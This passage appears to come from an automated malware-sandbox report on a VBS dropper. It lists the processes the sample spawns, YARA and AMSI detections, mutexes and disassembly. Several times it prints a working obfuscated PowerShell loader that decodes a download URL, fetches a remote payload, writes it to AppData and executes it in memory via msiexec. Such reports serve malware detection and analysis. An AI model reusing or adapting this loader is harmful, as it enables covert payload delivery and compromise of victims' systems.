,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF88B25BF66 9_2_00007FF88B25BF66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF88B25CD12 9_2_00007FF88B25CD12
              Source: CO894GOV2O25.vbs Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5982
              Source: unknown Process created: Commandline size = 5982
              Source: amsi64_7424.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7816.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@12/9@3/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Udskilleres.Bre
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-B04NAT
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkucyjce.3o1.ps1
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs"
              Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7424
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7816
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? 
,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: ystem.pdb source: powershell.exe, 00000009.00000002.1510863986.0000013ACCFD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdb.hz source: powershell.exe, 00000009.00000002.1547484456.0000013AE7139000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbh source: powershell.exe, 0000000C.00000002.1954822321.0000000006E60000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000009.00000002.1510863986.0000013ACCFD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000009.00000002.1547484456.0000013AE711C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000C.00000002.1954822321.0000000006E60000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("Powershell "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($N", "0")
              Source: Yara match File source: 0000000C.00000002.1963956226.000000000C5F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000002.1963821003.0000000008110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000002.1949177684.00000000054D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Mackle)$GlOBaL:SYnCopatEs = [SYSTem.teXt.encODIng]::asCii.getsTring($solCremeRS)$glObAl:BogdaGen=$SYNCOPaTEs.subsTriNG($AROidEouS208,$eNeBoERS)<#Preteressential Versifikationers Maxi
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Llingemors $Unexcitableness $Preambitiously), (Sjettes81 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Creda = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Splatterer)), $Feltbeskrivelsers).DefineDynamicModule($Myldretids, $false).DefineType($Desks183, $Terlinguaite, [System.MulticastDeleg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Mackle)$GlOBaL:SYnCopatEs = [SYSTem.teXt.encODIng]::asCii.getsTring($solCremeRS)$glObAl:BogdaGen=$SYNCOPaTEs.subsTriNG($AROidEouS208,$eNeBoERS)<#Preteressential Versifikationers Maxi
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? 
,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? 
,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88B255205 push eax; ret 9_2_00007FF88B255251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88B250942 push E95B70D0h; ret 9_2_00007FF88B2509C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88B323452 pushfd ; ret 9_2_00007FF88B323453
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06EBCF5C push eax; iretd 12_2_06EBCF5D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_088404CD pushfd ; retf 12_2_088404CE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_088466E7 push FFFFFFE2h; retf 12_2_088466EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_088438F5 push eax; iretd 12_2_088438F7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08844E16 push edi; ret 12_2_08844E22
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0884424D push ebx; ret 12_2_088442B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0884164A push eax; ret 12_2_0884164B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08846253 pushfd ; ret 12_2_08846256
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08845B8C push esi; ret 12_2_08845B97
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08843708 push eax; retf 12_2_08843709
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08844116 push ebx; ret 12_2_088442B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08845B75 push ecx; retf 12_2_08845B76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03935B8C push esi; ret 16_2_03935B97
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03934116 push ebx; ret 16_2_039342B2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03933708 push eax; retf 16_2_03933709
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03935B75 push ecx; retf 16_2_03935B76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_039304CD pushfd ; retf 16_2_039304CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_039338F5 push eax; iretd 16_2_039338F7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_039366E7 push FFFFFFE2h; retf 16_2_039366EA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03934E16 push edi; ret 16_2_03934E22
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_03936253 pushfd ; ret 16_2_03936256
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0393164A push eax; ret 16_2_0393164B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0393424D push ebx; ret 16_2_039342B2
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
